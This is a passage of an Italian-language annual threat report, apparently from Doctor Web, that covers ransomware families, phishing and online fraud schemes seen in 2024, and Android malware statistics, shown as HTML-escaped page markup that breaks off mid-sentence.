        &lt;dd&gt;Ransomware di criptazione conosciuto come STOP Ransomware. Cerca di ottenere la chiave privata dal server remoto, e in caso di insuccesso, utilizza quella trascritta nel codice. Per la criptazione di file il trojan utilizza l'algoritmo a flusso Salsa20.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; (2,21% delle richieste utente)&lt;/dt&gt;
        &lt;dd&gt;Ransomware di criptazione conosciuto come Macop (una delle varianti di questo trojan è &lt;b&gt;Trojan.Encoder.30572&lt;/b&gt;). Ha dimensioni ridotte, di circa 30-40 Kbyte. Questo è in parte dovuto al fatto che il trojan non porta con sé librerie crittografiche di terze parti, e per la criptazione e la generazione delle chiavi si avvale esclusivamente delle funzioni CryptoAPI. Per la criptazione di file utilizza l'algoritmo AES-256, e le chiavi stesse vengono cifrate tramite RSA-1024.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Encoder.37369&lt;/b&gt; (2,10% delle richieste utentes)&lt;/dt&gt;
        &lt;dd&gt;Una delle tante varianti di #Cylance ransomware. Per la criptazione di file utilizza l'algoritmo ChaCha12 con lo schema di scambio di chiavi a curva ellittica Curve25519 (X25519).&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="netfraud"&gt;
    &lt;h2 class="alignCenter"&gt;Frode online&lt;/h2&gt;
    &lt;p&gt;
        Durante il 2024 gli analisti internet dell'azienda Doctor Web osservavano un'alta attività dei cyber truffatori che 
        utilizzano sia gli scenari di inganno di utenti già diventati tradizionali e sia quelli nuovi. Nel segmento russo di 
        internet di nuovo sono stati i più diffusi gli schemi con l'utilizzo di siti fraudolenti di diversi formati. Uno di 
        essi erano le false risorse internet di negozi online e social network con promozioni ed estrazioni di regali 
        presumibilmente a loro nome. Le potenziali vittime sempre "vincono" su tali siti, ma per ricevere il premio inesistente, 
        vengono invitate a pagare una "commissione".
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/04_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/04_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Sito truffa, presumibilmente legato a un negozio online russo, suggerisce al visitatore di partecipare a un'estrazione a premi inesistente&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/05_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/05_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Falso sito del social network invita a "tentare la fortuna" e vincere grandi premi in denaro e altri regali&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Una delle varianti attuali di questo schema rimangono i falsi siti di rivenditori e negozi di elettrodomestici ed elettronica che offrono 
        l'acquisto di articoli con uno sconto. Di solito per il pagamento degli "ordini" su di essi viene chiesto di utilizzare l'online banking 
        o la carta bancaria, ma l'anno passato i truffatori hanno cominciato a suggerire l'SBP — Sistema di pagamenti rapidi.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/06_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/06_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Falso sito del negozio di elettrodomestici ed elettronica promette alle potenziali vittime grandi sconti&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/07_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/07_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Sito truffaldino suggerisce di utilizzare il sistema SBP come una delle modalità di pagamento "dell'ordine"&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        È rimasto popolare anche lo schema con biglietti lotto "gratuiti". Le estrazioni che presumibilmente sarebbero fatte online per le 
        potenziali vittime finiscono sempre con una "vittoria". Per ricevere il premio, gli utenti anche devono pagare una "commissione".
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/08_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/08_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Utente ha presumibilmente vinto a lotto 314.906 rubli, e per "ricevere" la vincita, dovrà pagare la "commissione".&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        I falsi siti a tema finanziario anche sono rimasti nell'arsenale dei truffatori. Godevano di popolarità i temi come ottenimento di certi 
        bonus dallo stato o da aziende private, investimenti nel settore del petrolio e gas, formazione sull'alfabetizzazione finanziaria, trading 
        di criptovalute e azioni con l'utilizzo di sistemi automatizzati "unici" o strategie "provate" che presumibilmente garantirebbero profitti, 
        e altri ancora. I malintenzionati, tra le altre cose, sfruttavano i nomi di personaggi dei social media per attirare l'attenzione degli utenti. 
        Esempi di tali siti sono riportati di seguito.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/09_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/09_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Sito fraudolento invita il visitatore a "guadagnare fino a €10.000 al mese sulla piattaforma unica WhatsApp"&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/10_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/10_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Cantante russo Shaman "ha rivelato una piattaforma segreta per il successo" che presumibilmente potrebbe procurare un guadagno di $14.000 al mese&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/11_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/11_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Falso sito di una compagnia petrolifera e del gas invita a ottenere l'accesso a un servizio di investimento e promette un guadagno a partire da 150.000 rubli&lt;/em&gt;&lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/14_fraud_2024.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/14_fraud_2024.1.png" alt="netfraud_2024"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/13_fraud_2024.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/13_fraud_2024.1.png" alt="netfraud_2024"&gt;
          &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Siti truffa che imitano i veri servizi di investimento di banche&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Allo stesso tempo, i nostri specialisti hanno rilevato anche nuovi schemi. Ad esempio, i truffatori, presumibilmente a nome di grandi aziende, 
        suggerivano agli utenti di partecipare per una ricompensa a sondaggi su qualità di servizi forniti. Tra le simili falsificazioni venivano 
        riscontrati siti fittizi di istituzioni di credito, dove agli utenti venivano chiesti i dati personali sensibili che potevano includere il nome 
        completo, il numero di cellulare collegato all'account della banca e il numero di carta bancaria.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/15_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/15_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Falso sito di una banca invita per una ricompensa di 6.000 rubli a partecipare a un sondaggio volto a "migliorare la qualità del servizio"&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Allo stesso tempo, le simili falsificazioni hanno interessato anche utenti da altri paesi. Ad esempio, il sito presentato sotto prometteva agli utenti europei dividendi per 
        l'investimento in settori di economia con buone prospettive:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/16_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/16_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Questo sito pubblicizzava una "nuova piattaforma di investimento da Google" tramite cui presumibilmente sia possibile guadagnare a partire da €1.000:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/17_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/17_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Un'altra risorsa internet truffaldina invitava gli utenti slovacchi a "guadagnare oltre $192.460 al mese" tramite un certo servizio di investimento:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/18_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/18_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Gli abitanti di Azerbaigian anche presumibilmente potevano migliorare la propria situazione finanziaria guadagnando a partire da 1.000 manat al mese. 
        A loro veniva chiesto di completare un piccolo sondaggio e ottenere l'accesso a un servizio presumibilmente legato a una compagnia petrolifera e del gas azera:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/19_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/19_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Alla fine dell'anno i truffatori hanno tradizionalmente iniziato ad adattare tali siti falsificazione al tema delle festività di capodanno. 
        Ad esempio, la seguente falsa risorsa internet di scambio di criptovalute prometteva agli utenti russi bonus di capodanno:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/20_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/20_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Un altro sito offriva loro bonus festivi presumibilmente a nome di un'azienda di investimento:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/21_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/21_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Mentre questa risorsa internet fraudolenta prometteva agli utenti da Kazakistan cospicui pagamenti in onore del Giorno dell'indipendenza nell'ambito di "un'offerta di capodanno":
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/22_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/22_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        Durante tutto l'anno i nostri analisti internet scoprivano anche altri siti di phishing. In particolare, questi includevano falsi siti di 
        servizi di formazione online. Uno di essi, come esempio, imitava l'aspetto esteriore di una vera risorsa internet e offriva presunti corsi 
        di programmazione. Per "l'ottenimento di una consulenza", agli utenti veniva chiesto di fornire i loro dati personali.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/23_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/23_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Falso sito camuffato da vera risorsa online di un servizio di formazione&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Inoltre, non cessavano i tentativi di furto di account utente Telegram tramite siti di phishing camuffati da varie votazioni online. 
        Tra questi di nuovo erano diffusi i siti con "votazioni in concorsi di disegno per bambini". Alle potenziali vittime viene chiesto 
        un numero di cellulare — presumibilmente sarebbe necessario per confermare il voto e ottenere un codice monouso. Tuttavia, inserendo 
        questo codice su tale sito, gli utenti aprono ai truffatori l'accesso ai propri account.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/24_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/24_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Sito di phishing per la "votazione" in un concorso online di disegno per bambini&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Su altri siti simili veniva suggerito di ottenere "gratuitamente" un abbonamento a Telegram Premium. 
        Agli utenti viene chiesto di entrare nel proprio account, tuttavia, i dati riservati inseriti su questi 
        siti vengono trasmessi ai malintenzionati i quali quindi rubano gli account. È interessante notare che i 
        link a queste risorse internet vengono distribuite, tra l'altro, anche attraverso il sistema di messaggistica 
        stesso. E il reale indirizzo del sito di destinazione nei messaggi spesso non coincide con quello che vedono gli utenti.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/25_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/25_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Messaggio di phishing su Telegram in cui, per "l'attivazione" di un abbonamento a Telegram Premium, viene suggerito di seguire il link fornito. Il testo del link in realtà non coincide con l'indirizzo di destinazione&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/26_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/26_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Sito di phishing caricato quando si passa al link dal messaggio fraudolento&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/27_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/27_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Dopo il clic sul pulsante sulla pagina precedente, il sito visualizza un modulo di accesso che assomiglia al vero modulo di login Telegram&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Per distribuire i link di siti fraudolenti, i criminali informatici utilizzano, tra l'altro, anche le email spam. 
        Nel corso dell'anno i nostri analisti internet registravano un gran numero di varie campagne di invio di spam. Così, 
        si osservava un'attiva distribuzione di email di phishing mirate agli utenti giapponesi. Ad esempio, i truffatori, 
        presumibilmente a nome di una delle istituzioni creditizie, informavano le potenziali vittime di un certo acquisto e 
        suggerivano loro di prendere visione dei dettagli del "pagamento" seguendo il link fornito. In realtà, il link portava 
        a una risorsa internet di phishing.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/28_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/28_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Mail di phishing, presumibilmente a nome di una banca, che invita gli utenti giapponesi a visualizzare i dettagli di un certo pagamento&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In un altro popolare scenario, i malintenzionati, presumibilmente a nome delle istituzioni creditizie, inviavano false notifiche con 
        informazioni sulle spese sulla carta bancaria per il mese. I link ai siti di phishing spesso erano mascherati e apparivano innocui 
        nel testo delle email.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/29_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/29_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Utenti nei testi delle email spam vedevano i link ai veri indirizzi dei siti delle banche, ma quando cliccati, i link portavano a una risorsa internet fraudolenta&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Un'altra campagna di invio di spam era rivolta agli utenti europei. Ad esempio, gli utenti da Belgio si imbattevano in 
        email di phishing che informavano di un presunto "blocco" dei loro conti bancari. Per "sbloccarli", si dovrebbe passare 
        al link fornito il quale in realtà portava al sito dei truffatori.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/30_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/30_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Mail indesiderata intimidisce la potenziale vittima con l'account bancario "bloccato"&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Si registravano anche altri invii di massa di email indesiderate — ad esempio, quelle progettate per un pubblico di lingua inglese. 
        In una delle campagne di spam le potenziali vittime ricevevano messaggi in cui veniva suggerito di confermare la ricezione di un 
        cospicuo bonifico. Il link in essi però portava a un modulo di login di online banking di phishing, che somigliava alla vera pagina 
        del sito dell'istituzione creditizia. 
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/31_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/31_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Email spam comunica che l'utente presumibilmente dovrebbe confermare la ricezione di $1218,16 USA&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        Gli utenti russi il più frequentemente riscontravano email spam che aiutavano i truffatori ad attirare le potenziali vittime verso i 
        popolari siti di phishing precedentemente segnati. Temi diffusi dei messaggi indesiderati erano i premi e gli sconti da negozi online, 
        i biglietti lotto gratuiti, l'accesso a servizi di investimento. Esempi di essi sono mostrati sugli screenshot sotto.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/32_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/32_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Email presumibilmente a nome di un negozio online in cui viene suggerito di partecipare a "un'estrazione a premi"&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/33_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/33_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Email presumibilmente a nome di un'istituzione creditizia che invita a "diventare un investitore di successo"&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/34_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/34_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Email presumibilmente inviata a nome di un negozio di elettronica in cui viene suggerito di attivare un codice promozionale e ricevere uno sconto su merci&lt;/em&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
    &lt;h2 class="alignCenter"&gt;Per dispositivi mobili&lt;/h2&gt;
    &lt;p&gt;
        Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, i programmi malevoli Android più diffusi nel 2024 di nuovo sono stati i trojan 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, che nascondono la proprio presenza sui dispositivi infetti e visualizzano annunci pubblicitari. Hanno rappresentato oltre un terzo dei 
        rilevamenti dei software malevoli. Tra i campioni di questa famiglia più attivi sono stati &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3956&lt;/b&gt;, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3851&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt; 
        e &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3994&lt;/b&gt;. Inoltre, gli utenti si imbattevano in varianti dei trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds.Aegis&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;, 
        che sono in grado di avviarsi automaticamente dopo l'installazione. Le applicazioni malevole più diffuse includono anche i trojan 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; utilizzati in vari schemi di frode e i trojan spia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy&amp;lng=it"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt;.
    &lt;/p&gt;
    &lt;p&gt;
        I programmi indesiderati più attivi sono stati i campioni delle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeMoney&amp;lng=it"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;, 
        &lt;a href="https://vms.drweb-av.it/search/?q=Program.CloudInject&amp;lng=it"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt; e &lt;a href="https://vms.drweb-av.it/search/?q=Program.FakeAntiVirus&amp;lng=it"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;. 
        Quelli primi suggeriscono di completare varie attività per ricompense virtuali le quali presumibilmente potrebbero essere ritirate 
        in futuro sotto forma di denaro reale, tuttavia, in realtà, gli utenti non ricevono da essi alcun pagamento. Quelli secondi sono 
        programmi modificati a cui, durante la modifica tramite un servizio cloud specializzato, vengono aggiunti un codice non controllato 
        e una serie di autorizzazioni pericolose. Quelli terzi simulano il funzionamento degli antivirus, rilevano le minacce inesistenti e 
        suggeriscono di acquistare una versione completa per risolvere i "problemi".
    &lt;/p&gt;
    &lt;p&gt;
        Le utility &lt;a href="https://vms.drweb-av.it/search/?q=Tool.SilentInstaller&amp;lng=it"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;, che consentono di avviare applicazioni Android senza installazione, di nuovo sono state i programmi 
        potenzialmente pericolosi più spesso rilevati — hanno rappresentato oltre un terzo dei casi di rilevamento di questo tipo di programmi. Risultano 
        frequenti anche le applicazioni modificate tramite l'utility NP Manager (rilevate come &lt;b&gt;Tool.NPMod&lt;/b&gt;). 
        In tali programmi viene integrato un modulo speciale che consente di aggirare il controllo della loro firma digitale dopo la loro modifica. Venivano 
        non di rado rilevati le applicazioni protette da un packer 
        &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Packer&amp;lng=it"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;, nonché il framework &lt;a href="https://vms.drweb-av.it/search/?q=Tool.Androlua&amp;lng=it"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;, che consente di modificare i programmi Android 
        installati ed eseguire gli script Lua, che potenzialmente possono essere malevoli.
    &lt;/p&gt;
    &lt;p&gt;
        Il software pubblicitario più diffuso è diventata una nuova famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Adware.ModAd&amp;lng=it"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt; — ha rappresentato quasi la metà dei rilevamenti. Sono versioni 
        specialmente modificate del programma di messaggistica WhatsApp, nelle funzionalità delle quali è incorporato un codice per il caricamento di link pubblicitari. 
        Secondi sono stati i campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Adware.Adpush&amp;lng=it"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;, e terzi quelli di un'altra nuova famiglia, 
        &lt;b&gt;Adware.Basement&lt;/b&gt;.
    &lt;/p&gt;
    &lt;p&gt;
        Rispetto al 2023, nel 2024 è alquanto aumentata l'attività dei trojan bancari per sistema operativo Android. A questo proposito, i nostri specialisti notavano una 
        crescita della popolarità di una serie di tecniche utilizzate dai cybercriminali per proteggere i software malevoli — in particolare, banker — da analisi e rilevamento 
        Tra le simile tecniche, erano le varie manipolazioni con il formato di archivi ZIP (sono la base di file APK) e il file di configurazione di programmi Android 
        &lt;span class="string"&gt;AndroidManifest.xml&lt;/span&gt;.
    &lt;/p&gt;
    &lt;p&gt;
        Va notata a parte l'ampia diffusione dell'applicazione malevola &lt;b&gt;Android.SpyMax&lt;/b&gt;. I malintenzionati utilizzavano attivamente questo programma spia in 
        qualità di trojan bancario, in particolare, contro gli utenti russi (il 46,23% dei casi di rilevamento), nonché i proprietari di dispositivi Android da 
        Brasile (il 35,46% dei casi) e Turchia (il 5,80% dei casi).
    &lt;/p&gt;
    &lt;p&gt;
        Nel corso dell'anno intero, gli analisti dei virus Doctor Web hanno rilevato oltre 200 diverse minacce sullo store di app Google Play. Tra queste erano i 
        trojan che abbonano utenti a servizi a pagamento, i trojan spia, i software fraudolenti e quelli pubblicitari. In totale essi sono stati scaricati almeno 
        26.700.000 volte. Oltre a questo, i nostri specialisti hanno registrato un ennesimo attacco ai box TV con sistema operativo Android: un backdoor modulare, 
